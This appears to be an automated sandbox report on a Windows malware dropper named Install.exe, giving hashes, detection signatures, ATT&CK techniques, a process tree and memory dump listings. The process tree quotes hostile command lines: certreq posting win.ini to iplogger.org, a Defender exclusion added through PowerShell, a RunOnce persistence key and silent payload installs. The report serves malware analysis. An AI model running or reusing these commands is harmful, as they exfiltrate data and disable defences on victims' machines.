5440a5863002acacb3ddb6b1deb84945aa004ace8bd64938b681e3fe059a8a23

Analysis

max time kernel
16s
max time network
62s
platform
windows10_x64
resource
win10v20201028
submitted
06-03-2021 07:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Install.exe
Size

852KB
MD5

98d1321a449526557d43498027e78a63
SHA1

d8584de7e33d30a8fc792b62aa7217d44332a345
SHA256

5440a5863002acacb3ddb6b1deb84945aa004ace8bd64938b681e3fe059a8a23
SHA512

3b6f59dbd605e59152837266a3e7814af463bb2cd7c9341c99fc5445de78e2dde73c11735bd145c6ad9c6d08d2c2810155558d5e9c441ac8b69ed609562385d0

Score

9^/10

evasion persistence upx

Malware Config

Signatures

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x000100000001aba0-147.dat	acprotect
behavioral1/files/0x000100000001aba0-146.dat	acprotect

Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Executes dropped EXE 6 IoCs

pid	Process
2420	multitimer.exe
3484	multitimer.exe
1872	multitimer.exe
4020	ezrswrotnll.exe
2704	safebits.exe
2136	ezrswrotnll.tmp

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000100000001aba0-147.dat	upx
behavioral1/files/0x000100000001aba0-146.dat	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\k4hkz1kwhju = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\XAY33RDGTP\\multitimer.exe\" 1 3.1615014585.60432ab93c34a"	multitimer.exe

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
52	ipinfo.io
54	ipinfo.io

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
4120	3568	WerFault.exe	115
4284	3568	WerFault.exe	115
2316	3568	WerFault.exe	115
796	3568	WerFault.exe	115
4972	3568	WerFault.exe	115
5320	3568	WerFault.exe	115
5408	3568	WerFault.exe	115

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3484	taskkill.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	53	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	56	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 54 IoCs

pid	Process
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe
1872	multitimer.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	756	Install.exe
Token: SeDebugPrivilege	2420	multitimer.exe
Token: SeDebugPrivilege	1872	multitimer.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 756 wrote to memory of 2420	756	Install.exe	74
PID 756 wrote to memory of 2420	756	Install.exe	74
PID 2420 wrote to memory of 3484	2420	multitimer.exe	78
PID 2420 wrote to memory of 3484	2420	multitimer.exe	78
PID 3484 wrote to memory of 1872	3484	multitimer.exe	80
PID 3484 wrote to memory of 1872	3484	multitimer.exe	80
PID 1872 wrote to memory of 4020	1872	multitimer.exe	81
PID 1872 wrote to memory of 4020	1872	multitimer.exe	81
PID 1872 wrote to memory of 4020	1872	multitimer.exe	81
PID 1872 wrote to memory of 2704	1872	multitimer.exe	82
PID 1872 wrote to memory of 2704	1872	multitimer.exe	82
PID 1872 wrote to memory of 2704	1872	multitimer.exe	82
PID 4020 wrote to memory of 2136	4020	ezrswrotnll.exe	83
PID 4020 wrote to memory of 2136	4020	ezrswrotnll.exe	83
PID 4020 wrote to memory of 2136	4020	ezrswrotnll.exe	83

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:756
- C:\Users\Admin\AppData\Local\Temp\XAY33RDGTP\multitimer.exe
  "C:\Users\Admin\AppData\Local\Temp\XAY33RDGTP\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2420
- - C:\Users\Admin\AppData\Local\Temp\XAY33RDGTP\multitimer.exe
    "C:\Users\Admin\AppData\Local\Temp\XAY33RDGTP\multitimer.exe" 1 3.1615014585.60432ab93c34a 101
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:3484
  - - C:\Users\Admin\AppData\Local\Temp\XAY33RDGTP\multitimer.exe
      "C:\Users\Admin\AppData\Local\Temp\XAY33RDGTP\multitimer.exe" 2 3.1615014585.60432ab93c34a
      4⤵
      Executes dropped EXE
      Checks for any installed AV software in registry
      Maps connected drives based on registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1872
    - - C:\Users\Admin\AppData\Local\Temp\ledunvgj4uc\ezrswrotnll.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ledunvgj4uc\ezrswrotnll.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4020
      - C:\Users\Admin\AppData\Local\Temp\is-ECNTS.tmp\ezrswrotnll.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-ECNTS.tmp\ezrswrotnll.tmp" /SL5="$70070,870426,780800,C:\Users\Admin\AppData\Local\Temp\ledunvgj4uc\ezrswrotnll.exe" /VERYSILENT
        6⤵
        Executes dropped EXE
        
        PID:2136
        
        C:\Users\Admin\AppData\Local\Temp\is-RUMHP.tmp\winlthst.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-RUMHP.tmp\winlthst.exe" test1 test1
        7⤵
        
        PID:4984
    - - C:\Users\Admin\AppData\Local\Temp\lgpq0nimdc4\safebits.exe
        
        "C:\Users\Admin\AppData\Local\Temp\lgpq0nimdc4\safebits.exe" /S /pubid=1 /subid=451
        5⤵
        Executes dropped EXE
        
        PID:2704
    - - C:\Users\Admin\AppData\Local\Temp\ulpknnwekep\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ulpknnwekep\Setup3310.exe" /Verysilent /subid=577
        5⤵
        
        PID:2028
      - C:\Users\Admin\AppData\Local\Temp\is-R259R.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-R259R.tmp\Setup3310.tmp" /SL5="$301CA,802346,56832,C:\Users\Admin\AppData\Local\Temp\ulpknnwekep\Setup3310.exe" /Verysilent /subid=577
        6⤵
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\is-EDHF3.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-EDHF3.tmp\Setup.exe" /Verysilent
        7⤵
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\is-C4HB7.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-C4HB7.tmp\Setup.tmp" /SL5="$20436,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-EDHF3.tmp\Setup.exe" /Verysilent
        8⤵
        
        PID:5020
    - - C:\Users\Admin\AppData\Local\Temp\swvtv52s53y\0atswer3rnp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\swvtv52s53y\0atswer3rnp.exe" testparams
        5⤵
        
        PID:2476
      - C:\Users\Admin\AppData\Roaming\ozpnunb5bez\0irmofazqaq.exe
        
        "C:\Users\Admin\AppData\Roaming\ozpnunb5bez\0irmofazqaq.exe" /VERYSILENT /p=testparams
        6⤵
        
        PID:2304
        
        C:\Users\Admin\AppData\Local\Temp\is-U46NR.tmp\0irmofazqaq.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-U46NR.tmp\0irmofazqaq.tmp" /SL5="$4019E,404973,58368,C:\Users\Admin\AppData\Roaming\ozpnunb5bez\0irmofazqaq.exe" /VERYSILENT /p=testparams
        7⤵
        
        PID:3744
    - - C:\Users\Admin\AppData\Local\Temp\if1jc4kclwz\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\if1jc4kclwz\vict.exe" /VERYSILENT /id=535
        5⤵
        
        PID:2116
      - C:\Users\Admin\AppData\Local\Temp\is-E3N93.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-E3N93.tmp\vict.tmp" /SL5="$10262,870426,780800,C:\Users\Admin\AppData\Local\Temp\if1jc4kclwz\vict.exe" /VERYSILENT /id=535
        6⤵
        
        PID:4156
        
        C:\Users\Admin\AppData\Local\Temp\is-1QBOS.tmp\wimapi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-1QBOS.tmp\wimapi.exe" 535
        7⤵
        
        PID:3980
    - - C:\Users\Admin\AppData\Local\Temp\gam35jyunx0\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gam35jyunx0\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        5⤵
        
        PID:4228
      - C:\Users\Admin\AppData\Local\Temp\is-2JJN9.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2JJN9.tmp\IBInstaller_97039.tmp" /SL5="$10356,14452723,721408,C:\Users\Admin\AppData\Local\Temp\gam35jyunx0\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        6⤵
        
        PID:4384
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
        7⤵
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\is-7HPIN.tmp\{app}\chrome_proxy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-7HPIN.tmp\{app}\chrome_proxy.exe"
        7⤵
        
        PID:5108
    - - C:\Users\Admin\AppData\Local\Temp\ged4s345xnv\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ged4s345xnv\app.exe" /8-23
        5⤵
        
        PID:4868
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Broken-Fog"
        6⤵
        
        PID:4432
    - - C:\Users\Admin\AppData\Local\Temp\ubln2h3tilf\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ubln2h3tilf\vpn.exe" /silent /subid=482
        5⤵
        
        PID:3304
    - - C:\Users\Admin\AppData\Local\Temp\5pek4uutpn4\lfdxyam12rx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5pek4uutpn4\lfdxyam12rx.exe" /ustwo INSTALL
        5⤵
        
        PID:3568
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 656
        6⤵
        Program crash
        
        PID:4120
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 668
        6⤵
        Program crash
        
        PID:4284
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 672
        6⤵
        Program crash
        
        PID:2316
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 728
        6⤵
        Program crash
        
        PID:796
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 884
        6⤵
        Program crash
        
        PID:4972
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 932
        6⤵
        Program crash
        
        PID:5320
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 1088
        6⤵
        Program crash
        
        PID:5408
    - - C:\Users\Admin\AppData\Local\Temp\uuvllzhkai5\w1iddfr2roo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\uuvllzhkai5\w1iddfr2roo.exe" 57a764d042bf8
        5⤵
        
        PID:728
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k "C:\Program Files\AG6SMP9PH4\AG6SMP9PH.exe" 57a764d042bf8 & exit
        6⤵
        
        PID:4596
        
        C:\Program Files\AG6SMP9PH4\AG6SMP9PH.exe
        
        "C:\Program Files\AG6SMP9PH4\AG6SMP9PH.exe" 57a764d042bf8
        7⤵
        
        PID:3884
    - - C:\Users\Admin\AppData\Local\Temp\npx3sfyamhe\chashepro3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\npx3sfyamhe\chashepro3.exe" /VERYSILENT
        5⤵
        
        PID:564
    - - C:\Users\Admin\AppData\Local\Temp\52npheyhbm1\askinstall24.exe
        
        "C:\Users\Admin\AppData\Local\Temp\52npheyhbm1\askinstall24.exe"
        5⤵
        
        PID:1180
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:3484

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
1⤵
PID:4292

C:\Program Files (x86)\JCleaner\Abbas.exe
"C:\Program Files (x86)\JCleaner\Abbas.exe"
1⤵
PID:4348

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
1⤵
PID:4316

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
1⤵
PID:4276
- C:\Windows\SysWOW64\certreq.exe
  certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
  2⤵
  PID:1424

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
1⤵
PID:4400

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
1⤵
PID:4444
- C:\Windows\SysWOW64\certreq.exe
  certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
  2⤵
  PID:3196

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
1⤵
PID:4504

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
1⤵
PID:4556

C:\Program Files (x86)\JCleaner\8.exe
"C:\Program Files (x86)\JCleaner\8.exe"
1⤵
PID:4588
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo grYNxrw
  2⤵
  PID:4936
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
  2⤵
  PID:4016
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    PID:2688

C:\Users\Admin\AppData\Local\Temp\is-QSVSE.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QSVSE.tmp\vpn.tmp" /SL5="$10254,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ubln2h3tilf\vpn.exe" /silent /subid=482
1⤵
PID:4104

C:\Users\Admin\AppData\Local\Temp\is-S82Q9.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S82Q9.tmp\chashepro3.tmp" /SL5="$301EC,2015144,58368,C:\Users\Admin\AppData\Local\Temp\npx3sfyamhe\chashepro3.exe" /VERYSILENT
1⤵
PID:3880

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/564-56-0x0000000000401000-0x000000000040C000-memory.dmp

Filesize
44KB

Download
memory/728-68-0x0000000001120000-0x0000000001122000-memory.dmp

Filesize
8KB

Download
memory/728-55-0x00007FFFCBDF0000-0x00007FFFCC790000-memory.dmp

Filesize
9.6MB

Download
memory/756-2-0x00007FFFD26D0000-0x00007FFFD30BC000-memory.dmp

Filesize
9.9MB

Download
memory/756-3-0x00000000009F0000-0x00000000009F1000-memory.dmp

Filesize
4KB

Download
memory/756-5-0x0000000000FD0000-0x0000000000FD2000-memory.dmp

Filesize
8KB

Download
memory/796-236-0x0000000004F60000-0x0000000004F61000-memory.dmp

Filesize
4KB

Download
memory/1844-95-0x0000000005060000-0x0000000005061000-memory.dmp

Filesize
4KB

Download
memory/1844-121-0x00000000050D0000-0x00000000050D1000-memory.dmp

Filesize
4KB

Download
memory/1844-110-0x00000000050A0000-0x00000000050A1000-memory.dmp

Filesize
4KB

Download
memory/1844-116-0x00000000050B0000-0x00000000050B1000-memory.dmp

Filesize
4KB

Download
memory/1844-93-0x0000000005050000-0x0000000005051000-memory.dmp

Filesize
4KB

Download
memory/1844-78-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/1844-118-0x00000000050C0000-0x00000000050C1000-memory.dmp

Filesize
4KB

Download
memory/1844-91-0x0000000005040000-0x0000000005041000-memory.dmp

Filesize
4KB

Download
memory/1844-99-0x0000000005080000-0x0000000005081000-memory.dmp

Filesize
4KB

Download
memory/1844-86-0x0000000005030000-0x0000000005031000-memory.dmp

Filesize
4KB

Download
memory/1844-83-0x0000000005010000-0x0000000005011000-memory.dmp

Filesize
4KB

Download
memory/1844-140-0x0000000005110000-0x0000000005111000-memory.dmp

Filesize
4KB

Download
memory/1844-103-0x0000000005090000-0x0000000005091000-memory.dmp

Filesize
4KB

Download
memory/1844-80-0x0000000005000000-0x0000000005001000-memory.dmp

Filesize
4KB

Download
memory/1844-85-0x0000000005020000-0x0000000005021000-memory.dmp

Filesize
4KB

Download
memory/1844-97-0x0000000005070000-0x0000000005071000-memory.dmp

Filesize
4KB

Download
memory/1844-75-0x0000000003921000-0x000000000394C000-memory.dmp

Filesize
172KB

Download
memory/1844-136-0x00000000050E0000-0x00000000050E1000-memory.dmp

Filesize
4KB

Download
memory/1844-137-0x00000000050F0000-0x00000000050F1000-memory.dmp

Filesize
4KB

Download
memory/1844-139-0x0000000005100000-0x0000000005101000-memory.dmp

Filesize
4KB

Download
memory/1872-22-0x00000000003C0000-0x00000000003C2000-memory.dmp

Filesize
8KB

Download
memory/1872-19-0x00007FFFCBDF0000-0x00007FFFCC790000-memory.dmp

Filesize
9.6MB

Download
memory/2028-45-0x0000000000401000-0x000000000040B000-memory.dmp

Filesize
40KB

Download
memory/2136-36-0x0000000000800000-0x0000000000801000-memory.dmp

Filesize
4KB

Download
memory/2316-224-0x00000000047A0000-0x00000000047A1000-memory.dmp

Filesize
4KB

Download
memory/2316-229-0x00000000047A0000-0x00000000047A1000-memory.dmp

Filesize
4KB

Download
memory/2420-10-0x0000000002AE0000-0x0000000002AE2000-memory.dmp

Filesize
8KB

Download
memory/2420-11-0x00007FFFCBDF0000-0x00007FFFCC790000-memory.dmp

Filesize
9.6MB

Download
memory/2476-67-0x00000000009F0000-0x00000000009F2000-memory.dmp

Filesize
8KB

Download
memory/2476-40-0x00007FFFCBDF0000-0x00007FFFCC790000-memory.dmp

Filesize
9.6MB

Download
memory/2704-31-0x0000000000510000-0x0000000000511000-memory.dmp

Filesize
4KB

Download
memory/3304-64-0x0000000000401000-0x0000000000417000-memory.dmp

Filesize
88KB

Download
memory/3484-21-0x0000000000960000-0x0000000000962000-memory.dmp

Filesize
8KB

Download
memory/3484-14-0x00007FFFCBDF0000-0x00007FFFCC790000-memory.dmp

Filesize
9.6MB

Download
memory/3568-182-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/3568-180-0x0000000003160000-0x0000000003161000-memory.dmp

Filesize
4KB

Download
memory/3568-181-0x0000000002D30000-0x0000000002D7C000-memory.dmp

Filesize
304KB

Download
memory/3744-254-0x00000000038C1000-0x00000000038C8000-memory.dmp

Filesize
28KB

Download
memory/3744-250-0x0000000003111000-0x0000000003115000-memory.dmp

Filesize
16KB

Download
